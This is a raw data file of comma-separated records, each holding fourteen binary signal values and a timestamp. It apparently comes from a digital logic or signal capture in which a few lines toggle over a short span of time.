1,0,0,1,0,1,0,0,0,1,0,0,0,0,7.5207720e-03 1,0,0,1,0,1,0,0,0,1,0,0,1,0,7.5207960e-03 1,0,0,1,0,1,0,0,0,1,0,0,0,0,7.5208200e-03 1,0,0,1,0,0,0,0,0,0,0,0,0,0,7.5208280e-03 1,0,0,1,0,0,0,0,0,0,0,0,1,0,7.5208680e-03 1,0,0,1,0,0,0,0,0,0,0,0,0,0,7.5208920e-03 1,0,0,1,0,0,0,0,0,0,0,0,1,0,7.5209440e-03 1,0,0,1,0,0,0,0,0,0,0,0,0,0,7.5209720e-03 1,0,0,1,0,0,0,0,0,0,0,0,1,0,7.5210200e-03 1,0,0,1,0,0,0,0,0,0,0,0,0,0,7.5210440e-03 1,0,0,1,0,0,0,0,0,0,0,0,1,0,7.5210920e-03 1,0,0,1,0,0,0,0,0,0,0,0,0,0,7.5211200e-03 1,0,0,1,0,1,0,0,0,1,0,0,0,0,7.5211240e-03 1,0,0,1,0,1,0,0,0,1,0,0,1,0,7.5211440e-03 1,0,0,1,0,1,0,0,0,1,0,0,0,0,7.5211720e-03 1,0,0,1,0,0,0,0,0,0,0,0,0,0,7.5211760e-03 1,0,0,1,0,0,0,0,0,0,0,0,1,0,7.5211960e-03 1,0,0,1,0,0,0,0,0,0,0,0,0,0,7.5212200e-03 1,0,0,1,0,0,0,0,0,0,0,0,1,0,7.5212440e-03 1,0,0,1,0,0,0,0,0,0,0,0,0,0,7.5212680e-03 1,0,0,1,0,0,0,0,0,0,0,0,1,0,7.5212920e-03 1,0,0,1,0,0,0,0,0,0,0,0,0,0,7.5213240e-03 1,0,0,1,0,0,0,0,0,0,0,0,1,0,7.5213480e-03 1,0,0,1,0,0,0,0,0,0,0,0,0,0,7.5213720e-03 1,0,0,1,0,0,0,0,0,0,0,0,1,0,7.5214000e-03 1,0,0,1,0,0,0,0,0,0,0,0,0,0,7.5214240e-03 1,0,0,1,0,0,0,0,0,0,0,0,1,0,7.5214480e-03 1,0,0,1,0,0,0,0,0,0,0,0,0,0,7.5214760e-03 1,0,0,1,0,0,0,0,0,0,0,0,1,0,7.5215000e-03 1,0,0,1,0,0,0,0,0,0,0,0,0,0,7.5215240e-03 1,0,0,1,0,0,0,0,0,0,0,0,1,0,7.5215480e-03 1,0,0,1,0,0,0,0,0,0,0,0,0,0,7.5215720e-03 1,0,0,1,0,0,0,0,0,0,0,0,1,0,7.5216240e-03 1,0,0,1,0,1,0,0,0,1,0,0,0,0,7.5216520e-03 1,0,0,1,0,1,0,0,0,1,0,0,1,0,7.5217000e-03 1,0,0,1,0,1,0,0,0,1,0,0,0,0,7.5217240e-03 1,0,0,1,0,0,0,0,0,0,0,0,0,0,7.5217320e-03 1,0,0,1,0,0,0,0,0,0,0,0,1,0,7.5217720e-03 1,0,0,1,0,0,0,0,0,0,0,0,0,0,7.5218000e-03 1,0,0,1,0,0,0,0,0,0,0,0,1,0,7.5218520e-03 1,0,0,1,0,0,0,0,0,0,0,0,0,0,7.5218760e-03 1,0,0,1,0,0,0,0,0,0,0,0,1,0,7.5219240e-03 1,0,0,1,0,0,0,0,0,0,0,0,0,0,7.5219480e-03 1,0,0,1,0,1,0,0,0,1,0,0,0,0,7.5219560e-03 1,0,0,1,0,1,0,0,0,1,0,0,1,0,7.5219720e-03 1,0,0,1,0,1,0,0,0,1,0,0,0,0,7.5220000e-03 1,0,0,1,0,0,0,0,0,0,0,0,0,0,7.5220040e-03 1,0,0,1,0,0,0,0,0,0,0,0,1,0,7.5220240e-03 1,0,0,1,0,0,0,0,0,0,0,0,0,0,7.5220480e-03 1,0,0,1,0,0,0,0,0,0,0,0,1,0,7.5220760e-03 1,0,0,1,0,0,0,0,0,0,0,0,0,0,7.5221000e-03 1,0,0,1,0,0,0,0,0,0,0,0,1,0,7.5221240e-03 1,0,0,1,0,0,0,0,0,0,0,0,0,0,7.5221480e-03 1,0,0,1,0,0,0,0,0,0,0,0,1,0,7.5221720e-03 1,0,0,1,0,0,0,0,0,0,0,0,0,0,7.5221960e-03 1,0,0,1,0,0,0,0,0,0,0,0,1,0,7.5222240e-03 1,0,0,1,0,1,0,0,0,1,0,0,0,0,7.5222520e-03 1,0,0,1,0,1,0,0,0,1,0,0,1,0,7.5223040e-03 1,0,0,1,0,1,0,0,0,1,0,0,0,0,7.5223240e-03 1,0,0,1,0,0,0,0,0,0,0,0,0,0,7.5223360e-03 1,0,0,1,0,0,0,0,0,0,0,0,1,0,7.5223560e-03 1,0,0,1,0,0,0,0,0,0,0,0,0,0,7.5223800e-03 1,0,0,1,0,0,0,0,0,0,0,0,1,0,7.5224040e-03 1,0,0,1,0,0,0,0,0,0,0,0,0,0,7.5224280e-03 1,0,0,1,0,1,0,0,0,1,0,0,0,0,7.5224360e-03 1,0,0,1,0,1,0,0,0,1,0,0,1,0,7.5224520e-03 1,0,0,1,0,1,0,0,0,1,0,0,0,0,7.5224800e-03 1,0,0,1,0,0,0,0,0,0,0,0,0,0,7.5224840e-03 1,0,0,1,0,0,0,0,0,0,0,0,1,0,7.5225320e-03 1,0,0,1,0,0,0,0,0,0,0,0,0,0,7.5225560e-03 1,0,0,1,0,0,0,0,0,0,0,0,1,0,7.5226040e-03 1,0,0,1,0,0,0,0,0,0,0,0,0,0,7.5226280e-03 1,0,0,1,0,0,0,0,0,0,0,0,1,0,7.5226800e-03 1,0,0,1,0,0,0,0,0,0,0,0,0,0,7.5227040e-03 1,0,0,1,0,0,0,0,0,0,0,0,1,0,7.5227560e-03 1,0,0,1,0,0,0,0,0,0,0,0,0,0,7.5227800e-03 1,0,0,1,0,1,0,0,0,1,0,0,0,0,7.5227840e-03 1,0,0,1,0,1,0,0,0,1,0,0,1,0,7.5228040e-03 1,0,0,1,0,1,0,0,0,1,0,0,0,0,7.5228280e-03 1,0,0,1,0,0,0,0,0,0,0,0,0,0,7.5228360e-03 1,0,0,1,0,0,0,0,0,0,0,0,1,0,7.5228520e-03 1,0,0,1,0,0,0,0,0,0,0,0,0,0,7.5228800e-03 1,0,0,1,0,0,0,0,0,0,0,0,1,0,7.5229040e-03 1,0,0,1,0,0,0,0,0,0,0,0,0,0,7.5229320e-03 1,0,0,1,0,0,0,0,0,0,0,0,1,0,7.5229560e-03 1,0,0,1,0,0,0,0,0,0,0,0,0,0,7.5229800e-03 1,0,0,1,0,0,0,0,0,0,0,0,1,0,7.5230040e-03 1,0,0,1,0,0,0,0,0,0,0,0,0,0,7.5230280e-03 1,0,0,1,0,0,0,0,0,0,0,0,1,0,7.5230520e-03 1,0,0,1,0,0,0,0,0,0,0,0,0,0,7.5230800e-03 1,0,0,1,0,0,0,0,0,0,0,0,1,0,7.5231040e-03 1,0,0,1,0,0,0,0,0,0,0,0,0,0,7.5231280e-03 1,0,0,1,0,0,0,0,0,0,0,0,1,0,7.5231560e-03 1,0,0,1,0,0,0,0,0,0,0,0,0,0,7.5231800e-03 1,0,0,1,0,0,0,0,0,0,0,0,1,0,7.5232040e-03 1,0,0,1,0,0,0,0,0,0,0,0,0,0,7.5232280e-03 1,0,0,1,0,1,0,0,0,1,0,0,0,0,7.5232360e-03 1,0,0,1,0,1,0,0,0,1,0,0,1,0,7.5232800e-03 1,0,0,1,0,1,0,0,0,1,0,0,0,0,7.5233040e-03 1,0,0,1,0,1,0,0,0,1,0,0,1,0,7.5233320e-03 1,0,0,1,0,1,0,0,0,1,0,0,0,0,7.5233560e-03 1,0,0,1,0,1,0,0,0,0,0,0,0,0,7.5233600e-03 1,0,0,1,0,0,0,0,0,0,0,0,0,0,7.5233640e-03 1,0,0,1,0,0,0,0,0,0,0,0,1,0,7.5234040e-03 1,0,0,1,0,0,0,0,0,0,0,0,0,0,7.5234280e-03 1,0,0,1,0,0,0,0,0,0,0,0,1,0,7.5234800e-03 1,0,0,1,0,0,0,0,0,0,0,0,0,0,7.5235040e-03 1,0,0,1,0,0,0,0,0,0,0,0,1,0,7.5235560e-03 1,0,0,1,0,0,0,0,0,0,0,0,0,0,7.5235800e-03 1,0,0,1,0,1,0,0,0,1,0,0,0,0,7.5235840e-03 1,0,0,1,0,1,0,0,0,1,0,0,1,0,7.5236040e-03 1,0,0,1,0,1,0,0,0,1,0,0,0,0,7.5236280e-03 1,0,0,1,0,0,0,0,0,0,0,0,0,0,7.5236360e-03 1,0,0,1,0,0,0,0,0,0,0,0,1,0,7.5236520e-03 1,0,0,1,0,0,0,0,0,0,0,0,0,0,7.5236800e-03 1,0,0,1,0,0,0,0,0,0,0,0,1,0,7.5237040e-03 1,0,0,1,0,0,0,0,0,0,0,0,0,0,7.5237280e-03 1,0,0,1,0,0,0,0,0,0,0,0,1,0,7.5237800e-03 1,0,0,1,0,0,0,0,0,0,0,0,0,0,7.5238040e-03 1,0,0,1,0,0,0,0,0,0,0,0,1,0,7.5238520e-03 1,0,0,1,0,0,0,0,0,0,0,0,0,0,7.5238800e-03 1,0,0,1,0,1,0,0,0,1,0,0,0,0,7.5238840e-03 1,0,0,1,0,1,0,0,0,1,0,0,1,0,7.5239320e-03 1,0,0,1,0,1,0,0,0,1,0,0,0,0,7.5239560e-03 1,0,0,1,0,0,0,0,0,0,0,0,0,0,7.5239640e-03 1,0,0,1,0,0,0,0,0,0,0,0,1,0,7.5240040e-03 1,0,0,1,0,0,0,0,0,0,0,0,0,0,7.5240280e-03 1,0,0,1,0,0,0,0,0,0,0,0,1,0,7.5240800e-03 1,0,0,1,0,0,0,0,0,0,0,0,0,0,7.5241040e-03 1,0,0,1,0,0,0,0,0,0,0,0,1,0,7.5241320e-03 1,0,0,1,0,0,0,0,0,0,0,0,0,0,7.5241560e-03 1,0,0,1,0,0,0,0,0,0,0,0,1,0,7.5241800e-03 1,0,0,1,0,0,0,0,0,0,0,0,0,0,7.5242040e-03 1,0,0,1,0,0,0,0,0,0,0,0,1,0,7.5242600e-03 1,0,0,1,0,0,0,0,0,0,0,0,0,0,7.5242840e-03 1,0,0,1,0,0,0,0,0,0,0,0,1,0,7.5243320e-03 1,0,0,1,0,0,0,0,0,0,0,0,0,0,7.5243560e-03 1,0,0,1,0,1,0,0,0,1,0,0,0,0,7.5243640e-03 1,0,0,1,0,1,0,0,0,1,0,0,1,0,7.5244040e-03 1,0,0,1,0,1,0,0,0,1,0,0,0,0,7.5244320e-03 1,0,0,1,0,1,0,0,0,0,0,0,0,0,7.5244360e-03 1,0,0,1,0,0,0,0,0,0,0,0,0,0,7.5244400e-03 1,0,0,1,0,0,0,0,0,0,0,0,1,0,7.5244840e-03 1,0,0,1,0,0,0,0,0,0,0,0,0,0,7.5245080e-03 1,0,0,1,0,0,0,0,0,0,0,0,1,0,7.5245560e-03 1,0,0,1,0,0,0,0,0,0,0,0,0,0,7.5245800e-03 1,0,0,1,0,0,0,0,0,0,0,0,1,0,7.5246040e-03 1,0,0,1,0,0,0,0,0,0,0,0,0,0,7.5246320e-03 1,0,0,1,0,1,0,0,0,1,0,0,0,0,7.5246360e-03 1,0,0,1,0,1,0,0,0,1,0,0,1,0,7.5246840e-03 1,0,0,1,0,1,0,0,0,1,0,0,0,0,7.5247080e-03 1,0,0,1,0,0,0,0,0,0,0,0,0,0,7.5247160e-03 1,0,0,1,0,0,0,0,0,0,0,0,1,0,7.5247320e-03 1,0,0,1,0,0,0,0,0,0,0,0,0,0,7.5247560e-03 1,0,0,1,0,0,0,0,0,0,0,0,1,0,7.5247800e-03 1,0,0,1,0,0,0,0,0,0,0,0,0,0,7.5248040e-03 1,0,0,1,0,0,0,0,0,0,0,0,1,0,7.5248320e-03 1,0,0,1,0,0,0,0,0,0,0,0,0,0,7.5248560e-03 1,0,0,1,0,0,0,0,0,0,0,0,1,0,7.5248840e-03 1,0,0,1,0,0,0,0,0,1,0,0,0,0,7.5249080e-03 1,0,0,1,0,1,0,0,0,1,0,0,0,0,7.5249120e-03 1,0,0,1,0,1,0,0,0,1,0,0,1,0,7.5249560e-03 1,0,0,1,0,1,0,0,0,1,0,0,0,0,7.5249800e-03 1,0,0,1,0,0,0,0,0,0,0,0,0,0,7.5249880e-03 1,0,0,1,0,0,0,0,0,0,0,0,1,0,7.5250040e-03 1,0,0,1,0,0,0,0,0,0,0,0,0,0,7.5250320e-03 1,0,0,1,0,1,0,0,0,1,0,0,0,0,7.5250360e-03 1,0,0,1,0,1,0,0,0,1,0,0,1,0,7.5250840e-03 1,0,0,1,0,1,0,0,0,1,0,0,0,0,7.5251080e-03 1,0,0,1,0,0,0,0,0,0,0,0,0,0,7.5251160e-03 1,0,0,1,0,0,0,0,0,0,0,0,1,0,7.5251320e-03 1,0,0,1,0,0,0,0,0,0,0,0,0,0,7.5251560e-03 1,0,0,1,0,0,0,0,0,0,0,0,1,0,7.5251800e-03 1,0,0,1,0,0,0,0,0,0,0,0,0,0,7.5252040e-03 1,0,0,1,0,0,0,0,0,0,0,0,1,0,7.5252320e-03 1,0,0,1,0,0,0,0,0,0,0,0,0,0,7.5252560e-03 1,0,0,1,0,1,0,0,0,1,0,0,0,0,7.5252600e-03 1,0,0,1,0,1,0,0,0,1,0,0,1,0,7.5252840e-03 1,0,0,1,0,1,0,0,0,1,0,0,0,0,7.5253080e-03 1,0,0,1,0,1,0,0,0,0,0,0,0,0,7.5253120e-03 1,0,0,1,0,0,0,0,0,0,0,0,0,0,7.5253160e-03 1,0,0,1,0,0,0,0,0,0,0,0,1,0,7.5253560e-03 1,0,0,1,0,0,0,0,0,0,0,0,0,0,7.5253800e-03 1,0,0,1,0,0,0,0,0,0,0,0,1,0,7.5254040e-03 1,0,0,1,0,0,0,0,0,0,0,0,0,0,7.5254320e-03 1,0,0,1,0,1,0,0,0,1,0,0,0,0,7.5254360e-03 1,0,0,1,0,1,0,0,0,1,0,0,1,0,7.5254560e-03 1,0,0,1,0,1,0,0,0,1,0,0,0,0,7.5254840e-03 1,0,0,1,0,0,0,0,0,0,0,0,0,0,7.5254880e-03 1,0,0,1,0,0,0,0,0,0,0,0,1,0,7.5255320e-03 1,0,0,1,0,0,0,0,0,0,0,0,0,0,7.5255560e-03 1,0,0,1,0,0,0,0,0,0,0,0,1,0,7.5256040e-03 1,0,0,1,0,0,0,0,0,0,0,0,0,0,7.5256320e-03 1,0,0,1,0,0,0,0,0,0,0,0,1,0,7.5256800e-03 1,0,0,1,0,0,0,0,0,0,0,0,0,0,7.5257040e-03 1,0,0,1,0,0,0,0,0,0,0,0,1,0,7.5257560e-03 1,0,0,1,0,0,0,0,0,0,0,0,0,0,7.5257800e-03 1,0,0,1,0,1,0,0,0,1,0,0,0,0,7.5257840e-03 1,0,0,1,0,1,0,0,0,1,0,0,1,0,7.5258040e-03 1,0,0,1,0,1,0,0,0,1,0,0,0,0,7.5258320e-03 1,0,0,1,0,0,0,0,0,0,0,0,0,0,7.5258360e-03 1,0,0,1,0,0,0,0,0,0,0,0,1,0,7.5258520e-03 1,0,0,1,0,0,0,0,0,0,0,0,0,0,7.5258800e-03 1,0,0,1,0,1,0,0,0,1,0,0,0,0,7.5258840e-03 1,0,0,1,0,1,0,0,0,1,0,0,1,0,7.5259320e-03 1,0,0,1,0,1,0,0,0,1,0,0,0,0,7.5259560e-03 1,0,0,1,0,0,0,0,0,0,0,0,0,0,7.5259640e-03 1,0,0,1,0,0,0,0,0,0,0,0,1,0,7.5259800e-03 1,0,0,1,0,0,0,0,0,0,0,0,0,0,7.5260040e-03 1,0,0,1,0,0,0,0,0,0,0,0,1,0,7.5260280e-03 1,0,0,1,0,0,0,0,0,0,0,0,0,0,7.5260520e-03 1,0,0,1,0,0,0,0,0,0,0,0,1,0,7.5260800e-03 1,0,0,1,0,0,0,0,0,0,0,0,0,0,7.5261040e-03 1,0,0,1,0,0,0,0,0,0,0,0,1,0,7.5261280e-03 1,0,0,1,0,1,0,0,0,1,0,0,0,0,7.5261560e-03 1,0,0,1,0,1,0,0,0,1,0,0,1,0,7.5262040e-03 1,0,0,1,0,1,0,0,0,1,0,0,0,0,7.5262280e-03 1,0,0,1,0,0,0,0,0,0,0,0,0,0,7.5262360e-03 1,0,0,1,0,0,0,0,0,0,0,0,1,0,7.5262520e-03 1,0,0,1,0,0,0,0,0,0,0,0,0,0,7.5262760e-03 1,0,0,1,0,0,0,0,0,0,0,0,1,0,7.5263040e-03 1,0,0,1,0,0,0,0,0,0,0,0,0,0,7.5263320e-03 1,0,0,1,0,0,0,0,0,0,0,0,1,0,7.5263560e-03 1,0,0,1,0,0,0,0,0,0,0,0,0,0,7.5263800e-03 1,0,0,1,0,0,0,0,0,0,0,0,1,0,7.5264040e-03 1,0,0,1,0,0,0,0,0,0,0,0,0,0,7.5264280e-03 1,0,0,1,0,0,0,0,0,0,0,0,1,0,7.5264520e-03 1,0,0,1,0,0,0,0,0,0,0,0,0,0,7.5264800e-03 1,0,0,1,0,0,0,0,0,0,0,0,1,0,7.5265040e-03 1,0,0,1,0,0,0,0,0,0,0,0,0,0,7.5265320e-03 1,0,0,1,0,0,0,0,0,0,0,0,1,0,7.5265560e-03 1,0,0,1,0,0,0,0,0,0,0,0,0,0,7.5265800e-03 1,0,0,1,0,0,0,0,0,0,0,0,1,0,7.5266040e-03 1,0,0,1,0,0,0,0,0,0,0,0,0,0,7.5266280e-03 1,0,0,1,0,0,0,0,0,0,0,0,1,0,7.5266520e-03 1,0,0,1,0,0,0,0,0,0,0,0,0,0,7.5266800e-03 1,0,0,1,0,0,0,0,0,0,0,0,1,0,7.5267040e-03 1,0,0,1,0,0,0,0,0,0,0,0,0,0,7.5267280e-03 1,0,0,1,0,0,0,0,0,0,0,0,1,0,7.5267560e-03 1,0,0,1,0,0,0,0,0,0,0,0,0,0,7.5267800e-03 1,0,0,1,0,0,0,0,0,0,0,0,1,0,7.5268040e-03 1,0,0,1,0,0,0,0,0,0,0,0,0,0,7.5268280e-03 1,0,0,1,0,0,0,0,0,0,0,0,1,0,7.5268520e-03 1,0,0,1,0,0,0,0,0,0,0,0,0,0,7.5268760e-03 1,0,0,1,0,0,0,0,0,0,0,0,1,0,7.5269040e-03 1,0,0,1,0,0,0,0,0,0,0,0,0,0,7.5269320e-03 1,0,0,1,0,0,0,0,0,0,0,0,1,0,7.5269560e-03 1,0,0,1,0,0,0,0,0,0,0,0,0,0,7.5269840e-03 1,0,0,1,0,0,0,0,0,0,0,0,1,0,7.5270120e-03 1,0,0,1,0,0,0,0,0,0,0,0,0,0,7.5270360e-03 1,0,0,1,0,0,0,0,0,0,0,0,1,0,7.5270600e-03 1,0,0,1,0,0,0,0,0,0,0,0,0,0,7.5270840e-03 1,0,0,1,0,0,0,0,0,0,0,0,0,1,7.6507640e-03 0,0,0,1,0,0,0,0,0,0,0,0,0,1,7.6509480e-03 0,1,0,1,0,0,0,0,0,0,0,0,0,1,7.6509640e-03 0,1,0,1,0,0,0,0,0,0,0,1,0,1,7.6509960e-03 0,1,0,1,0,0,0,0,0,0,0,0,0,1,7.6510200e-03 0,1,0,1,0,0,0,0,0,0,0,0,1,1,7.6513160e-03 0,1,0,1,0,0,0,0,0,0,0,0,0,1,7.6513400e-03 0,1,0,1,0,1,0,0,0,1,0,0,0,1,7.6513480e-03 0,1,0,1,0,1,0,0,0,1,0,0,1,1,7.6513640e-03 0,1,0,1,0,1,0,0,0,1,0,0,0,1,7.6513880e-03 0,1,0,1,0,1,0,0,0,1,0,0,1,1,7.6514120e-03 0,1,0,1,0,1,0,0,0,1,0,0,0,1,7.6514400e-03 0,1,0,1,0,1,0,0,0,1,0,0,1,1,7.6514640e-03 0,1,0,1,0,1,0,0,0,1,0,0,0,1,7.6514920e-03 0,1,0,1,0,1,0,0,0,1,0,0,1,1,7.6515160e-03 0,1,0,1,0,1,0,0,0,1,0,0,0,1,7.6515400e-03 0,1,0,1,0,0,0,0,0,0,0,0,0,1,7.6515480e-03 0,1,0,1,0,0,0,0,0,0,0,0,1,1,7.6515640e-03 0,1,0,1,0,0,0,0,0,0,0,0,0,1,7.6515880e-03 0,1,0,1,0,0,0,0,0,0,0,0,0,0,7.6515960e-03 0,1,0,1,0,0,0,0,0,0,0,0,1,0,7.6516160e-03 0,1,0,1,0,0,0,0,0,0,0,0,0,0,7.6516400e-03 0,1,0,1,0,0,0,0,0,0,0,0,1,0,7.6516680e-03 0,1,0,1,0,0,0,0,0,0,0,0,0,0,7.6516920e-03 0,1,0,1,0,1,0,0,0,1,0,0,0,0,7.6516960e-03 0,1,0,1,0,1,0,0,0,1,0,0,1,0,7.6517160e-03 0,1,0,1,0,1,0,0,0,1,0,0,0,0,7.6517400e-03 0,1,0,1,0,1,0,0,0,1,0,0,1,0,7.6517640e-03 0,1,0,1,0,1,0,0,0,1,0,0,0,0,7.6517880e-03 0,1,0,1,0,1,0,0,0,1,0,0,1,0,7.6518120e-03 0,1,0,1,0,1,0,0,0,1,0,0,0,0,7.6518400e-03 0,1,0,1,0,1,0,0,0,1,0,0,1,0,7.6518680e-03 0,1,0,1,0,1,0,0,0,1,0,0,0,0,7.6518920e-03 0,1,0,1,0,0,0,0,0,0,0,0,0,0,7.6519000e-03 0,1,0,1,0,0,0,0,0,0,0,0,1,0,7.6519160e-03 0,1,0,1,0,0,0,0,0,0,0,0,0,0,7.6519400e-03 0,1,0,1,0,0,0,0,0,0,0,0,1,0,7.6519640e-03 0,1,0,1,0,0,0,0,0,0,0,0,0,0,7.6519880e-03 0,1,0,1,0,0,0,0,0,0,0,0,1,0,7.6520120e-03 0,1,0,1,0,0,0,0,0,0,0,0,0,0,7.6520400e-03 0,1,0,1,0,1,0,0,0,1,0,0,0,0,7.6520440e-03 0,1,0,1,0,1,0,0,0,1,0,0,1,0,7.6520680e-03 0,1,0,1,0,1,0,0,0,1,0,0,0,0,7.6520920e-03 0,1,0,1,0,1,0,0,0,1,0,0,1,0,7.6521160e-03 0,1,0,1,0,1,0,0,0,1,0,0,0,0,7.6521400e-03 0,1,0,1,0,1,0,0,0,1,0,0,1,0,7.6521640e-03 0,1,0,1,0,1,0,0,0,1,0,0,0,0,7.6521880e-03 0,1,0,1,0,1,0,0,0,1,0,0,1,0,7.6522120e-03 0,1,0,1,0,1,0,0,0,1,0,0,0,0,7.6522400e-03 0,1,0,1,0,0,0,0,0,0,0,0,0,0,7.6522440e-03 0,1,0,1,0,0,0,0,0,0,0,0,1,0,7.6522640e-03 0,1,0,1,0,0,0,0,0,0,0,0,0,0,7.6522920e-03 0,1,0,1,0,0,0,0,0,0,0,0,1,0,7.6523160e-03 0,1,0,1,0,0,0,0,0,0,0,0,0,0,7.6523400e-03 0,1,0,1,0,0,0,0,0,0,0,0,1,0,7.6523640e-03 0,1,0,1,0,0,0,0,0,0,0,0,0,0,7.6523880e-03 0,1,0,1,0,1,0,0,0,1,0,0,0,0,7.6523960e-03 0,1,0,1,0,1,0,0,0,1,0,0,1,0,7.6524120e-03 0,1,0,1,0,1,0,0,0,1,0,0,0,0,7.6524400e-03 0,1,0,1,0,1,0,0,0,1,0,0,1,0,7.6524640e-03 0,1,0,1,0,1,0,0,0,1,0,0,0,0,7.6524920e-03 0,1,0,1,0,1,0,0,0,1,0,0,1,0,7.6525160e-03 0,1,0,1,0,1,0,0,0,1,0,0,0,0,7.6525400e-03 0,1,0,1,0,1,0,0,0,1,0,0,1,0,7.6525640e-03 0,1,0,1,0,1,0,0,0,1,0,0,0,0,7.6525880e-03 0,1,0,1,0,0,0,0,0,0,0,0,0,0,7.6525960e-03 0,1,0,1,0,0,0,0,0,0,0,0,1,0,7.6526120e-03 0,1,0,1,0,0,0,0,0,0,0,0,0,0,7.6526400e-03 0,1,0,1,0,0,0,0,0,0,0,0,1,0,7.6526640e-03 0,1,0,1,0,0,0,0,0,0,0,0,0,0,7.6526920e-03 0,1,0,1,0,0,0,0,0,0,0,0,1,0,7.6527400e-03 0,1,0,1,0,0,0,0,0,0,0,0,0,0,7.6527640e-03 0,1,0,1,0,0,0,0,0,0,0,0,1,0,7.6528160e-03 0,1,0,1,0,0,0,0,0,0,0,0,0,0,7.6528400e-03 0,1,0,1,0,0,0,0,0,0,0,0,1,0,7.6528920e-03 0,1,0,1,0,0,0,0,0,0,0,0,0,0,7.6529160e-03 0,1,0,1,0,0,0,0,0,0,0,0,1,0,7.6529640e-03 0,1,0,1,0,0,0,0,0,0,0,0,0,0,7.6529880e-03 0,1,0,1,0,0,0,0,0,0,0,0,1,0,7.6530400e-03 0,1,0,1,0,0,0,0,0,0,0,0,0,0,7.6530640e-03 0,1,0,1,0,0,0,0,0,0,0,0,1,0,7.6531160e-03 0,1,0,1,0,0,0,0,0,0,0,0,0,0,7.6531400e-03 0,1,0,1,0,0,0,0,0,0,0,0,1,0,7.6531640e-03 0,1,0,1,0,0,0,0,0,0,0,0,0,0,7.6531880e-03 0,1,0,1,0,1,0,0,0,1,0,0,0,0,7.6531960e-03 0,1,0,1,0,1,0,0,0,1,0,0,1,0,7.6532120e-03 0,1,0,1,0,1,0,0,0,1,0,0,0,0,7.6532400e-03 0,1,0,1,0,1,0,0,0,1,0,0,1,0,7.6532640e-03 0,1,0,1,0,1,0,0,0,1,0,0,0,0,7.6532920e-03 0,1,0,1,0,1,0,0,0,1,0,0,1,0,7.6533160e-03 0,1,0,1,0,1,0,0,0,1,0,0,0,0,7.6533400e-03 0,1,0,1,0,1,0,0,0,1,0,0,1,0,7.6533640e-03 0,1,0,1,0,1,0,0,0,1,0,0,0,0,7.6533880e-03 0,1,0,1,0,1,0,0,0,1,0,0,1,0,7.6534120e-03 0,1,0,1,0,1,0,0,0,1,0,0,0,0,7.6534400e-03 0,1,0,1,0,0,0,0,0,0,0,0,0,0,7.6534440e-03 0,1,0,1,0,0,0,0,0,0,0,0,1,0,7.6534640e-03 0,1,0,1,0,0,0,0,0,0,0,0,0,0,7.6534920e-03 0,1,0,1,0,0,0,0,0,0,0,0,1,0,7.6535160e-03 0,1,0,1,0,0,0,0,0,0,0,0,0,0,7.6535400e-03 0,1,0,1,0,0,0,0,0,0,0,0,1,0,7.6535640e-03 0,1,0,1,0,0,0,0,0,0,0,0,0,0,7.6535880e-03 0,1,0,1,0,0,0,0,0,0,0,0,1,0,7.6536120e-03 0,1,0,1,0,0,0,0,0,0,0,0,0,0,7.6536400e-03 0,1,0,1,0,0,0,0,0,0,0,0,1,0,7.6536640e-03 0,1,0,1,0,0,0,0,0,0,0,0,0,0,7.6536920e-03 0,1,0,1,0,0,0,0,0,0,0,0,1,0,7.6537160e-03 0,1,0,1,0,0,0,0,0,0,0,0,0,0,7.6537400e-03 0,1,0,1,0,1,0,0,0,1,0,0,0,0,7.6537440e-03 0,1,0,1,0,1,0,0,0,1,0,0,1,0,7.6537640e-03 0,1,0,1,0,1,0,0,0,1,0,0,0,0,7.6537880e-03 0,1,0,1,0,0,0,0,0,0,0,0,0,0,7.6537960e-03 0,1,0,1,0,0,0,0,0,0,0,0,1,0,7.6538120e-03 0,1,0,1,0,0,0,0,0,0,0,0,0,0,7.6538400e-03 0,1,0,1,0,0,0,0,0,0,0,0,1,0,7.6538640e-03 0,1,0,1,0,0,0,0,0,0,0,0,0,0,7.6538920e-03 0,1,0,1,0,0,0,0,0,0,0,0,1,0,7.6539160e-03 0,1,0,1,0,0,0,0,0,0,0,0,0,0,7.6539400e-03 0,1,0,1,0,1,0,0,0,1,0,0,0,0,7.6539440e-03 0,1,0,1,0,1,0,0,0,1,0,0,1,0,7.6539640e-03 0,1,0,1,0,1,0,0,0,1,0,0,0,0,7.6539880e-03 0,1,0,1,0,1,0,0,0,1,0,0,1,0,7.6540120e-03 0,1,0,1,0,1,0,0,0,1,0,0,0,0,7.6540400e-03 0,1,0,1,0,1,0,0,0,1,0,0,1,0,7.6540640e-03 0,1,0,1,0,1,0,0,0,1,0,0,0,0,7.6540920e-03 0,1,0,1,0,1,0,0,0,1,0,0,1,0,7.6541160e-03 0,1,0,1,0,1,0,0,0,1,0,0,0,0,7.6541400e-03 0,1,0,1,0,0,0,0,0,0,0,0,0,0,7.6541480e-03 0,1,0,1,0,0,0,0,0,0,0,0,1,0,7.6541640e-03 0,1,0,1,0,0,0,0,0,0,0,0,0,0,7.6541880e-03 0,1,0,1,0,0,0,0,0,0,0,0,1,0,7.6542120e-03 0,1,0,1,0,0,0,0,0,0,0,0,0,0,7.6542400e-03 0,1,0,1,0,0,0,0,0,0,0,0,1,0,7.6542920e-03 0,1,0,1,0,0,0,0,0,0,0,0,0,0,7.6543120e-03 0,1,0,1,0,0,0,0,0,0,0,0,1,0,7.6543640e-03 0,1,0,1,0,0,0,0,0,0,0,0,0,0,7.6543880e-03 0,1,0,1,0,0,0,0,0,0,0,0,1,0,7.6544400e-03 0,1,0,1,0,0,0,0,0,0,0,0,0,0,7.6544640e-03 0,1,0,1,0,0,0,0,0,0,0,0,1,0,7.6545120e-03 0,1,0,1,0,0,0,0,0,0,0,0,0,0,7.6545400e-03 0,1,0,1,0,0,0,0,0,0,0,0,1,0,7.6545880e-03 0,1,0,1,0,0,0,0,0,0,0,0,0,0,7.6546120e-03 0,1,0,1,0,0,0,0,0,0,0,0,1,0,7.6546680e-03 0,1,0,1,0,0,0,0,0,0,0,0,0,0,7.6546920e-03 0,1,0,1,0,0,0,0,0,0,0,0,1,0,7.6547120e-03 0,1,0,1,0,1,0,0,0,1,0,0,0,0,7.6547400e-03 0,1,0,1,0,1,0,0,0,1,0,0,1,0,7.6547640e-03 0,1,0,1,0,1,0,0,0,1,0,0,0,0,7.6547880e-03 0,1,0,1,0,0,0,0,0,0,0,0,0,0,7.6547960e-03 0,1,0,1,0,0,0,0,0,0,0,0,1,0,7.6548120e-03 0,1,0,1,0,0,0,0,0,0,0,0,0,0,7.6548400e-03 0,1,0,1,0,1,0,0,0,1,0,0,0,0,7.6548440e-03 0,1,0,1,0,1,0,0,0,1,0,0,1,0,7.6548640e-03 